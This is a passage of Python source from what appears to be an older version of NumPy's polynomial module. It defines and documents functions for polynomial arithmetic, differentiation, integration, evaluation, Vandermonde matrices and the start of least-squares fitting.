'polyadd', 'polysub', 'polymulx', 'polymul', 'polydiv', 'polypow',
'polyval', 'polyder', 'polyint', 'polyfromroots', 'polyvander',
'polyfit', 'polytrim', 'polyroots', 'Polynomial', 'polyval2d',
'polyval3d', 'polygrid2d', 'polygrid3d', 'polyvander2d', 'polyvander3d']
import numpy as np
import numpy.linalg as la
from . import polyutils as pu
import warnings
from .polytemplate import polytemplate
polytrim = pu.trimcoef
#
# These are constant arrays are of integer type so as to be compatible
# with the widest range of other types, such as Decimal.
#
# Polynomial default domain.
polydomain = np.array([-1, 1])
# Polynomial coefficients representing zero.
polyzero = np.array([0])
# Polynomial coefficients representing one.
polyone = np.array([1])
# Polynomial coefficients representing the identity x.
polyx = np.array([0, 1])
#
# Polynomial series functions
#
def polyline(off, scl) :
"""
Returns an array representing a linear polynomial.
Parameters
----------
off, scl : scalars
The "y-intercept" and "slope" of the line, respectively.
Returns
-------
y : ndarray
This module's representation of the linear polynomial ``off +
scl*x``.
See Also
--------
chebline
Examples
--------
>>> from numpy import polynomial as P
>>> P.polyline(1,-1)
array([ 1, -1])
>>> P.polyval(1, P.polyline(1,-1)) # should be 0
0.0
"""
if scl != 0 :
return np.array([off, scl])
else :
return np.array([off])
def polyfromroots(roots) :
"""
Generate a monic polynomial with given roots.
Return the coefficients of the polynomial
.. math:: p(x) = (x - r_0) * (x - r_1) * ... * (x - r_n),
where the `r_n` are the roots specified in `roots`. If a zero has
multiplicity n, then it must appear in `roots` n times. For instance,
if 2 is a root of multiplicity three and 3 is a root of multiplicity 2,
then `roots` looks something like [2, 2, 2, 3, 3]. The roots can appear
in any order.
If the returned coefficients are `c`, then
.. math:: p(x) = c_0 + c_1 * x + ... + x^n
The coefficient of the last term is 1 for monic polynomials in this
form.
Parameters
----------
roots : array_like
Sequence containing the roots.
Returns
-------
out : ndarray
1-D array of the polynomial's coefficients If all the roots are
real, then `out` is also real, otherwise it is complex. (see
Examples below).
See Also
--------
chebfromroots, legfromroots, lagfromroots, hermfromroots
hermefromroots
Notes
-----
The coefficients are determined by multiplying together linear factors
of the form `(x - r_i)`, i.e.
.. math:: p(x) = (x - r_0) (x - r_1) ... (x - r_n)
where ``n == len(roots) - 1``; note that this implies that `1` is always
returned for :math:`a_n`.
Examples
--------
>>> import numpy.polynomial as P
>>> P.polyfromroots((-1,0,1)) # x(x - 1)(x + 1) = x^3 - x
array([ 0., -1., 0., 1.])
>>> j = complex(0,1)
>>> P.polyfromroots((-j,j)) # complex returned, though values are real
array([ 1.+0.j, 0.+0.j, 1.+0.j])
"""
if len(roots) == 0 :
return np.ones(1)
else :
[roots] = pu.as_series([roots], trim=False)
roots.sort()
p = [polyline(-r, 1) for r in roots]
n = len(p)
while n > 1:
m, r = divmod(n, 2)
tmp = [polymul(p[i], p[i+m]) for i in range(m)]
if r:
tmp[0] = polymul(tmp[0], p[-1])
p = tmp
n = m
return p[0]
def polyadd(c1, c2):
"""
Add one polynomial to another.
Returns the sum of two polynomials `c1` + `c2`. The arguments are
sequences of coefficients from lowest order term to highest, i.e.,
[1,2,3] represents the polynomial ``1 + 2*x + 3*x**2``.
Parameters
----------
c1, c2 : array_like
1-D arrays of polynomial coefficients ordered from low to high.
Returns
-------
out : ndarray
The coefficient array representing their sum.
See Also
--------
polysub, polymul, polydiv, polypow
Examples
--------
>>> from numpy import polynomial as P
>>> c1 = (1,2,3)
>>> c2 = (3,2,1)
>>> sum = P.polyadd(c1,c2); sum
array([ 4., 4., 4.])
>>> P.polyval(2, sum) # 4 + 4(2) + 4(2**2)
28.0
"""
# c1, c2 are trimmed copies
[c1, c2] = pu.as_series([c1, c2])
if len(c1) > len(c2) :
c1[:c2.size] += c2
ret = c1
else :
c2[:c1.size] += c1
ret = c2
return pu.trimseq(ret)
def polysub(c1, c2):
"""
Subtract one polynomial from another.
Returns the difference of two polynomials `c1` - `c2`. The arguments
are sequences of coefficients from lowest order term to highest, i.e.,
[1,2,3] represents the polynomial ``1 + 2*x + 3*x**2``.
Parameters
----------
c1, c2 : array_like
1-D arrays of polynomial coefficients ordered from low to
high.
Returns
-------
out : ndarray
Of coefficients representing their difference.
See Also
--------
polyadd, polymul, polydiv, polypow
Examples
--------
>>> from numpy import polynomial as P
>>> c1 = (1,2,3)
>>> c2 = (3,2,1)
>>> P.polysub(c1,c2)
array([-2., 0., 2.])
>>> P.polysub(c2,c1) # -P.polysub(c1,c2)
array([ 2., 0., -2.])
"""
# c1, c2 are trimmed copies
[c1, c2] = pu.as_series([c1, c2])
if len(c1) > len(c2) :
c1[:c2.size] -= c2
ret = c1
else :
c2 = -c2
c2[:c1.size] += c1
ret = c2
return pu.trimseq(ret)
def polymulx(c):
"""Multiply a polynomial by x.
Multiply the polynomial `c` by x, where x is the independent
variable.
Parameters
----------
c : array_like
1-D array of polynomial coefficients ordered from low to
high.
Returns
-------
out : ndarray
Array representing the result of the multiplication.
Notes
-----
.. versionadded:: 1.5.0
"""
# c is a trimmed copy
[c] = pu.as_series([c])
# The zero series needs special treatment
if len(c) == 1 and c[0] == 0:
return c
prd = np.empty(len(c) + 1, dtype=c.dtype)
prd[0] = c[0]*0
prd[1:] = c
return prd
def polymul(c1, c2):
"""
Multiply one polynomial by another.
Returns the product of two polynomials `c1` * `c2`. The arguments are
sequences of coefficients, from lowest order term to highest, e.g.,
[1,2,3] represents the polynomial ``1 + 2*x + 3*x**2.``
Parameters
----------
c1, c2 : array_like
1-D arrays of coefficients representing a polynomial, relative to the
"standard" basis, and ordered from lowest order term to highest.
Returns
-------
out : ndarray
Of the coefficients of their product.
See Also
--------
polyadd, polysub, polydiv, polypow
Examples
--------
>>> import numpy.polynomial as P
>>> c1 = (1,2,3)
>>> c2 = (3,2,1)
>>> P.polymul(c1,c2)
array([ 3., 8., 14., 8., 3.])
"""
# c1, c2 are trimmed copies
[c1, c2] = pu.as_series([c1, c2])
ret = np.convolve(c1, c2)
return pu.trimseq(ret)
def polydiv(c1, c2):
"""
Divide one polynomial by another.
Returns the quotient-with-remainder of two polynomials `c1` / `c2`.
The arguments are sequences of coefficients, from lowest order term
to highest, e.g., [1,2,3] represents ``1 + 2*x + 3*x**2``.
Parameters
----------
c1, c2 : array_like
1-D arrays of polynomial coefficients ordered from low to high.
Returns
-------
[quo, rem] : ndarrays
Of coefficient series representing the quotient and remainder.
See Also
--------
polyadd, polysub, polymul, polypow
Examples
--------
>>> import numpy.polynomial as P
>>> c1 = (1,2,3)
>>> c2 = (3,2,1)
>>> P.polydiv(c1,c2)
(array([ 3.]), array([-8., -4.]))
>>> P.polydiv(c2,c1)
(array([ 0.33333333]), array([ 2.66666667, 1.33333333]))
"""
# c1, c2 are trimmed copies
[c1, c2] = pu.as_series([c1, c2])
if c2[-1] == 0 :
raise ZeroDivisionError()
len1 = len(c1)
len2 = len(c2)
if len2 == 1 :
return c1/c2[-1], c1[:1]*0
elif len1 < len2 :
return c1[:1]*0, c1
else :
dlen = len1 - len2
scl = c2[-1]
c2 = c2[:-1]/scl
i = dlen
j = len1 - 1
while i >= 0 :
c1[i:j] -= c2*c1[j]
i -= 1
j -= 1
return c1[j+1:]/scl, pu.trimseq(c1[:j+1])
def polypow(c, pow, maxpower=None) :
"""Raise a polynomial to a power.
Returns the polynomial `c` raised to the power `pow`. The argument
`c` is a sequence of coefficients ordered from low to high. i.e.,
[1,2,3] is the series ``1 + 2*x + 3*x**2.``
Parameters
----------
c : array_like
1-D array of array of series coefficients ordered from low to
high degree.
pow : integer
Power to which the series will be raised
maxpower : integer, optional
Maximum power allowed. This is mainly to limit growth of the series
to unmanageable size. Default is 16
Returns
-------
coef : ndarray
Power series of power.
See Also
--------
polyadd, polysub, polymul, polydiv
Examples
--------
"""
# c is a trimmed copy
[c] = pu.as_series([c])
power = int(pow)
if power != pow or power < 0 :
raise ValueError("Power must be a non-negative integer.")
elif maxpower is not None and power > maxpower :
raise ValueError("Power is too large")
elif power == 0 :
return np.array([1], dtype=c.dtype)
elif power == 1 :
return c
else :
# This can be made more efficient by using powers of two
# in the usual way.
prd = c
for i in range(2, power + 1) :
prd = np.convolve(prd, c)
return prd
def polyder(c, m=1, scl=1, axis=0):
"""
Differentiate a polynomial.
Returns the polynomial coefficients `c` differentiated `m` times along
`axis`. At each iteration the result is multiplied by `scl` (the
scaling factor is for use in a linear change of variable). The
argument `c` is an array of coefficients from low to high degree along
each axis, e.g., [1,2,3] represents the polynomial ``1 + 2*x + 3*x**2``
while [[1,2],[1,2]] represents ``1 + 1*x + 2*y + 2*x*y`` if axis=0 is
``x`` and axis=1 is ``y``.
Parameters
----------
c : array_like
Array of polynomial coefficients. If c is multidimensional the
different axis correspond to different variables with the degree
in each axis given by the corresponding index.
m : int, optional
Number of derivatives taken, must be non-negative. (Default: 1)
scl : scalar, optional
Each differentiation is multiplied by `scl`. The end result is
multiplication by ``scl**m``. This is for use in a linear change
of variable. (Default: 1)
axis : int, optional
Axis over which the derivative is taken. (Default: 0).
.. versionadded:: 1.7.0
Returns
-------
der : ndarray
Polynomial coefficients of the derivative.
See Also
--------
polyint
Examples
--------
>>> from numpy import polynomial as P
>>> c = (1,2,3,4) # 1 + 2x + 3x**2 + 4x**3
>>> P.polyder(c) # (d/dx)(c) = 2 + 6x + 12x**2
array([ 2., 6., 12.])
>>> P.polyder(c,3) # (d**3/dx**3)(c) = 24
array([ 24.])
>>> P.polyder(c,scl=-1) # (d/d(-x))(c) = -2 - 6x - 12x**2
array([ -2., -6., -12.])
>>> P.polyder(c,2,-1) # (d**2/d(-x)**2)(c) = 6 + 24x
array([ 6., 24.])
"""
c = np.array(c, ndmin=1, copy=1)
if c.dtype.char in '?bBhHiIlLqQpP':
# astype fails with NA
c = c + 0.0
cdt = c.dtype
cnt, iaxis = [int(t) for t in [m, axis]]
if cnt != m:
raise ValueError("The order of derivation must be integer")
if cnt < 0:
raise ValueError("The order of derivation must be non-negative")
if iaxis != axis:
raise ValueError("The axis must be integer")
if not -c.ndim <= iaxis < c.ndim:
raise ValueError("The axis is out of range")
if iaxis < 0:
iaxis += c.ndim
if cnt == 0:
return c
c = np.rollaxis(c, iaxis)
n = len(c)
if cnt >= n:
c = c[:1]*0
else :
for i in range(cnt):
n = n - 1
c *= scl
der = np.empty((n,) + c.shape[1:], dtype=cdt)
for j in range(n, 0, -1):
der[j - 1] = j*c[j]
c = der
c = np.rollaxis(c, 0, iaxis + 1)
return c
def polyint(c, m=1, k=[], lbnd=0, scl=1, axis=0):
"""
Integrate a polynomial.
Returns the polynomial coefficients `c` integrated `m` times from
`lbnd` along `axis`. At each iteration the resulting series is
**multiplied** by `scl` and an integration constant, `k`, is added.
The scaling factor is for use in a linear change of variable. ("Buyer
beware": note that, depending on what one is doing, one may want `scl`
to be the reciprocal of what one might expect; for more information,
see the Notes section below.) The argument `c` is an array of
coefficients, from low to high degree along each axis, e.g., [1,2,3]
represents the polynomial ``1 + 2*x + 3*x**2`` while [[1,2],[1,2]]
represents ``1 + 1*x + 2*y + 2*x*y`` if axis=0 is ``x`` and axis=1 is
``y``.
Parameters
----------
c : array_like
1-D array of polynomial coefficients, ordered from low to high.
m : int, optional
Order of integration, must be positive. (Default: 1)
k : {[], list, scalar}, optional
Integration constant(s). The value of the first integral at zero
is the first value in the list, the value of the second integral
at zero is the second value, etc. If ``k == []`` (the default),
all constants are set to zero. If ``m == 1``, a single scalar can
be given instead of a list.
lbnd : scalar, optional
The lower bound of the integral. (Default: 0)
scl : scalar, optional
Following each integration the result is *multiplied* by `scl`
before the integration constant is added. (Default: 1)
axis : int, optional
Axis over which the integral is taken. (Default: 0).
.. versionadded:: 1.7.0
Returns
-------
S : ndarray
Coefficient array of the integral.
Raises
------
ValueError
If ``m < 1``, ``len(k) > m``.
See Also
--------
polyder
Notes
-----
Note that the result of each integration is *multiplied* by `scl`. Why
is this important to note? Say one is making a linear change of
variable :math:`u = ax + b` in an integral relative to `x`. Then
.. math::`dx = du/a`, so one will need to set `scl` equal to
:math:`1/a` - perhaps not what one would have first thought.
Examples
--------
>>> from numpy import polynomial as P
>>> c = (1,2,3)
>>> P.polyint(c) # should return array([0, 1, 1, 1])
array([ 0., 1., 1., 1.])
>>> P.polyint(c,3) # should return array([0, 0, 0, 1/6, 1/12, 1/20])
array([ 0. , 0. , 0. , 0.16666667, 0.08333333,
0.05 ])
>>> P.polyint(c,k=3) # should return array([3, 1, 1, 1])
array([ 3., 1., 1., 1.])
>>> P.polyint(c,lbnd=-2) # should return array([6, 1, 1, 1])
array([ 6., 1., 1., 1.])
>>> P.polyint(c,scl=-2) # should return array([0, -2, -2, -2])
array([ 0., -2., -2., -2.])
"""
c = np.array(c, ndmin=1, copy=1)
if c.dtype.char in '?bBhHiIlLqQpP':
# astype doesn't preserve mask attribute.
c = c + 0.0
cdt = c.dtype
if not np.iterable(k):
k = [k]
cnt, iaxis = [int(t) for t in [m, axis]]
if cnt != m:
raise ValueError("The order of integration must be integer")
if cnt < 0 :
raise ValueError("The order of integration must be non-negative")
if len(k) > cnt :
raise ValueError("Too many integration constants")
if iaxis != axis:
raise ValueError("The axis must be integer")
if not -c.ndim <= iaxis < c.ndim:
raise ValueError("The axis is out of range")
if iaxis < 0:
iaxis += c.ndim
if cnt == 0:
return c
k = list(k) + [0]*(cnt - len(k))
c = np.rollaxis(c, iaxis)
for i in range(cnt):
n = len(c)
c *= scl
if n == 1 and np.all(c[0] == 0):
c[0] += k[i]
else:
tmp = np.empty((n + 1,) + c.shape[1:], dtype=cdt)
tmp[0] = c[0]*0
tmp[1] = c[0]
for j in range(1, n):
tmp[j + 1] = c[j]/(j + 1)
tmp[0] += k[i] - polyval(lbnd, tmp)
c = tmp
c = np.rollaxis(c, 0, iaxis + 1)
return c
def polyval(x, c, tensor=True):
"""
Evaluate a polynomial at points x.
If `c` is of length `n + 1`, this function returns the value
.. math:: p(x) = c_0 + c_1 * x + ... + c_n * x^n
The parameter `x` is converted to an array only if it is a tuple or a
list, otherwise it is treated as a scalar. In either case, either `x`
or its elements must support multiplication and addition both with
themselves and with the elements of `c`.
If `c` is a 1-D array, then `p(x)` will have the same shape as `x`. If
`c` is multidimensional, then the shape of the result depends on the
value of `tensor`. If `tensor` is true the shape will be c.shape[1:] +
x.shape. If `tensor` is false the shape will be c.shape[1:]. Note that
scalars have shape (,).
Trailing zeros in the coefficients will be used in the evaluation, so
they should be avoided if efficiency is a concern.
Parameters
----------
x : array_like, compatible object
If `x` is a list or tuple, it is converted to an ndarray, otherwise
it is left unchanged and treated as a scalar. In either case, `x`
or its elements must support addition and multiplication with
with themselves and with the elements of `c`.
c : array_like
Array of coefficients ordered so that the coefficients for terms of
degree n are contained in c[n]. If `c` is multidimensional the
remaining indices enumerate multiple polynomials. In the two
dimensional case the coefficients may be thought of as stored in
the columns of `c`.
tensor : boolean, optional
If True, the shape of the coefficient array is extended with ones
on the right, one for each dimension of `x`. Scalars have dimension 0
for this action. The result is that every column of coefficients in
`c` is evaluated for every element of `x`. If False, `x` is broadcast
over the columns of `c` for the evaluation. This keyword is useful
when `c` is multidimensional. The default value is True.
.. versionadded:: 1.7.0
Returns
-------
values : ndarray, compatible object
The shape of the returned array is described above.
See Also
--------
polyval2d, polygrid2d, polyval3d, polygrid3d
Notes
-----
The evaluation uses Horner's method.
Examples
--------
>>> from numpy.polynomial.polynomial import polyval
>>> polyval(1, [1,2,3])
6.0
>>> a = np.arange(4).reshape(2,2)
>>> a
array([[0, 1],
[2, 3]])
>>> polyval(a, [1,2,3])
array([[ 1., 6.],
[ 17., 34.]])
>>> coef = np.arange(4).reshape(2,2) # multidimensional coefficients
>>> coef
array([[0, 1],
[2, 3]])
>>> polyval([1,2], coef, tensor=True)
array([[ 2., 4.],
[ 4., 7.]])
>>> polyval([1,2], coef, tensor=False)
array([ 2., 7.])
"""
c = np.array(c, ndmin=1, copy=0)
if c.dtype.char in '?bBhHiIlLqQpP':
# astype fails with NA
c = c + 0.0
if isinstance(x, (tuple, list)):
x = np.asarray(x)
if isinstance(x, np.ndarray) and tensor:
c = c.reshape(c.shape + (1,)*x.ndim)
c0 = c[-1] + x*0
for i in range(2, len(c) + 1) :
c0 = c[-i] + c0*x
return c0
def polyval2d(x, y, c):
"""
Evaluate a 2-D polynomial at points (x, y).
This function returns the value
.. math:: p(x,y) = \\sum_{i,j} c_{i,j} * x^i * y^j
The parameters `x` and `y` are converted to arrays only if they are
tuples or a lists, otherwise they are treated as a scalars and they
must have the same shape after conversion. In either case, either `x`
and `y` or their elements must support multiplication and addition both
with themselves and with the elements of `c`.
If `c` has fewer than two dimensions, ones are implicitly appended to
its shape to make it 2-D. The shape of the result will be c.shape[2:] +
x.shape.
Parameters
----------
x, y : array_like, compatible objects
The two dimensional series is evaluated at the points `(x, y)`,
where `x` and `y` must have the same shape. If `x` or `y` is a list
or tuple, it is first converted to an ndarray, otherwise it is left
unchanged and, if it isn't an ndarray, it is treated as a scalar.
c : array_like
Array of coefficients ordered so that the coefficient of the term
of multi-degree i,j is contained in `c[i,j]`. If `c` has
dimension greater than two the remaining indices enumerate multiple
sets of coefficients.
Returns
-------
values : ndarray, compatible object
The values of the two dimensional polynomial at points formed with
pairs of corresponding values from `x` and `y`.
See Also
--------
polyval, polygrid2d, polyval3d, polygrid3d
Notes
-----
.. versionadded::1.7.0
"""
try:
x, y = np.array((x, y), copy=0)
except:
raise ValueError('x, y are incompatible')
c = polyval(x, c)
c = polyval(y, c, tensor=False)
return c
def polygrid2d(x, y, c):
"""
Evaluate a 2-D polynomial on the Cartesian product of x and y.
This function returns the values:
.. math:: p(a,b) = \\sum_{i,j} c_{i,j} * a^i * b^j
where the points `(a, b)` consist of all pairs formed by taking
`a` from `x` and `b` from `y`. The resulting points form a grid with
`x` in the first dimension and `y` in the second.
The parameters `x` and `y` are converted to arrays only if they are
tuples or a lists, otherwise they are treated as a scalars. In either
case, either `x` and `y` or their elements must support multiplication
and addition both with themselves and with the elements of `c`.
If `c` has fewer than two dimensions, ones are implicitly appended to
its shape to make it 2-D. The shape of the result will be c.shape[2:] +
x.shape + y.shape.
Parameters
----------
x, y : array_like, compatible objects
The two dimensional series is evaluated at the points in the
Cartesian product of `x` and `y`. If `x` or `y` is a list or
tuple, it is first converted to an ndarray, otherwise it is left
unchanged and, if it isn't an ndarray, it is treated as a scalar.
c : array_like
Array of coefficients ordered so that the coefficients for terms of
degree i,j are contained in ``c[i,j]``. If `c` has dimension
greater than two the remaining indices enumerate multiple sets of
coefficients.
Returns
-------
values : ndarray, compatible object
The values of the two dimensional polynomial at points in the Cartesian
product of `x` and `y`.
See Also
--------
polyval, polyval2d, polyval3d, polygrid3d
Notes
-----
.. versionadded::1.7.0
"""
c = polyval(x, c)
c = polyval(y, c)
return c
def polyval3d(x, y, z, c):
"""
Evaluate a 3-D polynomial at points (x, y, z).
This function returns the values:
.. math:: p(x,y,z) = \\sum_{i,j,k} c_{i,j,k} * x^i * y^j * z^k
The parameters `x`, `y`, and `z` are converted to arrays only if
they are tuples or a lists, otherwise they are treated as a scalars and
they must have the same shape after conversion. In either case, either
`x`, `y`, and `z` or their elements must support multiplication and
addition both with themselves and with the elements of `c`.
If `c` has fewer than 3 dimensions, ones are implicitly appended to its
shape to make it 3-D. The shape of the result will be c.shape[3:] +
x.shape.
Parameters
----------
x, y, z : array_like, compatible object
The three dimensional series is evaluated at the points
`(x, y, z)`, where `x`, `y`, and `z` must have the same shape. If
any of `x`, `y`, or `z` is a list or tuple, it is first converted
to an ndarray, otherwise it is left unchanged and if it isn't an
ndarray it is treated as a scalar.
c : array_like
Array of coefficients ordered so that the coefficient of the term of
multi-degree i,j,k is contained in ``c[i,j,k]``. If `c` has dimension
greater than 3 the remaining indices enumerate multiple sets of
coefficients.
Returns
-------
values : ndarray, compatible object
The values of the multidimensional polynomial on points formed with
triples of corresponding values from `x`, `y`, and `z`.
See Also
--------
polyval, polyval2d, polygrid2d, polygrid3d
Notes
-----
.. versionadded::1.7.0
"""
try:
x, y, z = np.array((x, y, z), copy=0)
except:
raise ValueError('x, y, z are incompatible')
c = polyval(x, c)
c = polyval(y, c, tensor=False)
c = polyval(z, c, tensor=False)
return c
def polygrid3d(x, y, z, c):
"""
Evaluate a 3-D polynomial on the Cartesian product of x, y and z.
This function returns the values:
.. math:: p(a,b,c) = \\sum_{i,j,k} c_{i,j,k} * a^i * b^j * c^k
where the points `(a, b, c)` consist of all triples formed by taking
`a` from `x`, `b` from `y`, and `c` from `z`. The resulting points form
a grid with `x` in the first dimension, `y` in the second, and `z` in
the third.
The parameters `x`, `y`, and `z` are converted to arrays only if they
are tuples or a lists, otherwise they are treated as a scalars. In
either case, either `x`, `y`, and `z` or their elements must support
multiplication and addition both with themselves and with the elements
of `c`.
If `c` has fewer than three dimensions, ones are implicitly appended to
its shape to make it 3-D. The shape of the result will be c.shape[3:] +
x.shape + y.shape + z.shape.
Parameters
----------
x, y, z : array_like, compatible objects
The three dimensional series is evaluated at the points in the
Cartesian product of `x`, `y`, and `z`. If `x`,`y`, or `z` is a
list or tuple, it is first converted to an ndarray, otherwise it is
left unchanged and, if it isn't an ndarray, it is treated as a
scalar.
c : array_like
Array of coefficients ordered so that the coefficients for terms of
degree i,j are contained in ``c[i,j]``. If `c` has dimension
greater than two the remaining indices enumerate multiple sets of
coefficients.
Returns
-------
values : ndarray, compatible object
The values of the two dimensional polynomial at points in the Cartesian
product of `x` and `y`.
See Also
--------
polyval, polyval2d, polygrid2d, polyval3d
Notes
-----
.. versionadded::1.7.0
"""
c = polyval(x, c)
c = polyval(y, c)
c = polyval(z, c)
return c
def polyvander(x, deg) :
"""Vandermonde matrix of given degree.
Returns the Vandermonde matrix of degree `deg` and sample points
`x`. The Vandermonde matrix is defined by
.. math:: V[..., i] = x^i,
where `0 <= i <= deg`. The leading indices of `V` index the elements of
`x` and the last index is the power of `x`.
If `c` is a 1-D array of coefficients of length `n + 1` and `V` is the
matrix ``V = polyvander(x, n)``, then ``np.dot(V, c)`` and
``polyval(x, c)`` are the same up to roundoff. This equivalence is
useful both for least squares fitting and for the evaluation of a large
number of polynomials of the same degree and sample points.
Parameters
----------
x : array_like
Array of points. The dtype is converted to float64 or complex128
depending on whether any of the elements are complex. If `x` is
scalar it is converted to a 1-D array.
deg : int
Degree of the resulting matrix.
Returns
-------
vander : ndarray.
The Vandermonde matrix. The shape of the returned matrix is
``x.shape + (deg + 1,)``, where the last index is the power of `x`.
The dtype will be the same as the converted `x`.
See Also
--------
polyvander2d, polyvander3d
"""
ideg = int(deg)
if ideg != deg:
raise ValueError("deg must be integer")
if ideg < 0:
raise ValueError("deg must be non-negative")
x = np.array(x, copy=0, ndmin=1) + 0.0
dims = (ideg + 1,) + x.shape
dtyp = x.dtype
v = np.empty(dims, dtype=dtyp)
v[0] = x*0 + 1
if ideg > 0 :
v[1] = x
for i in range(2, ideg + 1) :
v[i] = v[i-1]*x
return np.rollaxis(v, 0, v.ndim)
def polyvander2d(x, y, deg) :
"""Pseudo-Vandermonde matrix of given degrees.
Returns the pseudo-Vandermonde matrix of degrees `deg` and sample
points `(x, y)`. The pseudo-Vandermonde matrix is defined by
.. math:: V[..., deg[1]*i + j] = x^i * y^j,
where `0 <= i <= deg[0]` and `0 <= j <= deg[1]`. The leading indices of
`V` index the points `(x, y)` and the last index encodes the powers of
`x` and `y`.
If ``V = polyvander2d(x, y, [xdeg, ydeg])``, then the columns of `V`
correspond to the elements of a 2-D coefficient array `c` of shape
(xdeg + 1, ydeg + 1) in the order
.. math:: c_{00}, c_{01}, c_{02} ... , c_{10}, c_{11}, c_{12} ...
and ``np.dot(V, c.flat)`` and ``polyval2d(x, y, c)`` will be the same
up to roundoff. This equivalence is useful both for least squares
fitting and for the evaluation of a large number of 2-D polynomials
of the same degrees and sample points.
Parameters
----------
x, y : array_like
Arrays of point coordinates, all of the same shape. The dtypes
will be converted to either float64 or complex128 depending on
whether any of the elements are complex. Scalars are converted to
1-D arrays.
deg : list of ints
List of maximum degrees of the form [x_deg, y_deg].
Returns
-------
vander2d : ndarray
The shape of the returned matrix is ``x.shape + (order,)``, where
:math:`order = (deg[0]+1)*(deg([1]+1)`. The dtype will be the same
as the converted `x` and `y`.
See Also
--------
polyvander, polyvander3d. polyval2d, polyval3d
"""
ideg = [int(d) for d in deg]
is_valid = [id == d and id >= 0 for id, d in zip(ideg, deg)]
if is_valid != [1, 1]:
raise ValueError("degrees must be non-negative integers")
degx, degy = ideg
x, y = np.array((x, y), copy=0) + 0.0
vx = polyvander(x, degx)
vy = polyvander(y, degy)
v = vx[..., None]*vy[..., None,:]
# einsum bug
#v = np.einsum("...i,...j->...ij", vx, vy)
return v.reshape(v.shape[:-2] + (-1,))
def polyvander3d(x, y, z, deg) :
"""Pseudo-Vandermonde matrix of given degrees.
Returns the pseudo-Vandermonde matrix of degrees `deg` and sample
points `(x, y, z)`. If `l, m, n` are the given degrees in `x, y, z`,
then The pseudo-Vandermonde matrix is defined by
.. math:: V[..., (m+1)(n+1)i + (n+1)j + k] = x^i * y^j * z^k,
where `0 <= i <= l`, `0 <= j <= m`, and `0 <= j <= n`. The leading
indices of `V` index the points `(x, y, z)` and the last index encodes
the powers of `x`, `y`, and `z`.
If ``V = polyvander3d(x, y, z, [xdeg, ydeg, zdeg])``, then the columns
of `V` correspond to the elements of a 3-D coefficient array `c` of
shape (xdeg + 1, ydeg + 1, zdeg + 1) in the order
.. math:: c_{000}, c_{001}, c_{002},... , c_{010}, c_{011}, c_{012},...
and ``np.dot(V, c.flat)`` and ``polyval3d(x, y, z, c)`` will be the
same up to roundoff. This equivalence is useful both for least squares
fitting and for the evaluation of a large number of 3-D polynomials
of the same degrees and sample points.
Parameters
----------
x, y, z : array_like
Arrays of point coordinates, all of the same shape. The dtypes will
be converted to either float64 or complex128 depending on whether
any of the elements are complex. Scalars are converted to 1-D
arrays.
deg : list of ints
List of maximum degrees of the form [x_deg, y_deg, z_deg].
Returns
-------
vander3d : ndarray
The shape of the returned matrix is ``x.shape + (order,)``, where
:math:`order = (deg[0]+1)*(deg([1]+1)*(deg[2]+1)`. The dtype will
be the same as the converted `x`, `y`, and `z`.
See Also
--------
polyvander, polyvander3d. polyval2d, polyval3d
Notes
-----
.. versionadded::1.7.0
"""
ideg = [int(d) for d in deg]
is_valid = [id == d and id >= 0 for id, d in zip(ideg, deg)]
if is_valid != [1, 1, 1]:
raise ValueError("degrees must be non-negative integers")
degx, degy, degz = ideg
x, y, z = np.array((x, y, z), copy=0) + 0.0
vx = polyvander(x, degx)
vy = polyvander(y, degy)
vz = polyvander(z, degz)
v = vx[..., None, None]*vy[..., None,:, None]*vz[..., None, None,:]
# einsum bug
#v = np.einsum("...i, ...j, ...k->...ijk", vx, vy, vz)
return v.reshape(v.shape[:-3] + (-1,))
def polyfit(x, y, deg, rcond=None, full=False, w=None):
"""
Least-squares fit of a polynomial to data.
Return the coefficients of a polynomial of degree `deg` that is the
least squares fit to the data values `y` given at points `x`. If `y` is
1-D the returned coefficients will also be 1-D. If `y` is 2-D multiple
fits are done, one for each column of `y`, and the resulting
coefficients are stored in the corresponding columns of a 2-D return.
The fitted polynomial(s) are in the form
.. math:: p(x) = c_0 + c_1 * x + ... + c_n * x^n,
where `n` is `deg`.
Since numpy version 1.7.0, polyfit also supports NA. If any of the
elements of `x`, `y`, or `w` are NA, then the corresponding rows of the
linear least squares problem (see Notes) are set to 0. If `y` is 2-D,
then an NA in any row of `y` invalidates that whole row.
Parameters
----------
x : array_like, shape (`M`,)
x-coordinates of the `M` sample (data) points ``(x[i], y[i])``.
y : array_like, shape (`M`,) or (`M`, `K`)
y-coordinates of the sample points. Several sets of sample points
sharing the same x-coordinates can be (independently) fit with one
call to `polyfit` by passing in for `y` a 2-D array that contains
one data set per column.
deg : int
Degree of the polynomial(s) to be fit.
rcond : float, optional
Relative condition number of the fit. Singular values smaller
than `rcond`, relative to the largest singular value, will be
ignored. The default value is ``len(x)*eps``, where `eps` is the
relative precision of the platform's float type, about 2e-16 in
most cases.
full : bool, optional
Switch determining the nature of the return value. When ``False``
(the default) just the coefficients are returned; when ``True``,
diagnostic information from the singular value decomposition (used
to solve the fit's matrix equation) is also returned.
w : array_like, shape (`M`,), optional
Weights. If not None, the contribution of each point
``(x[i],y[i])`` to the fit is weighted by `w[i]`. Ideally the
weights are chosen so that the errors of the products ``w[i]*y[i]``
all have the same variance. The default value is None.
.. versionadded:: 1.5.0
Returns
-------
coef : ndarray, shape (`deg` + 1,) or (`deg` + 1, `K`)
Polynomial coefficients ordered from low to high. If `y` was 2-D,
the coefficients in column `k` of `coef` represent the polynomial
fit to the data in `y`'s `k`-th column.
[residuals, rank, singular_values, rcond] : present when `full` == True
Sum of the squared residuals (SSR) of the least-squares fit; the
effective rank of the scaled Vandermonde matrix; its singular
values; and the specified value of `rcond`. For more information,
see `linalg.lstsq`.
Raises
------
RankWarning
Raised if the matrix in the least-squares fit is rank deficient.
The warning is only raised if `full` == False. The warnings can
be turned off by:
>>> import warnings
>>> warnings.simplefilter('ignore', RankWarning)
See Also
--------
chebfit, legfit, lagfit, hermfit, hermefit
polyval : Evaluates a polynomial.
polyvander : Vandermonde matrix for powers.
linalg.lstsq : Computes a least-squares fit from the matrix.
scipy.interpolate.UnivariateSpline : Computes spline fits.
Notes
-----
The solution is the coefficients of the polynomial `p` that minimizes
the sum of the weighted squared errors
.. math :: E = \\sum_j w_j^2 * |y_j - p(x_j)|^2,
where the :math:`w_j` are the weights. This problem is solved by
setting up the (typically) over-determined matrix equation:
.. math :: V(x) * c = w * y,
where `V` is the weighted pseudo Vandermonde matrix of `x`, `c` are the
coefficients to be solved for, `w` are the weights, and `y` are the
observed values. This equation is then solved using the singular value
decomposition of `V`.
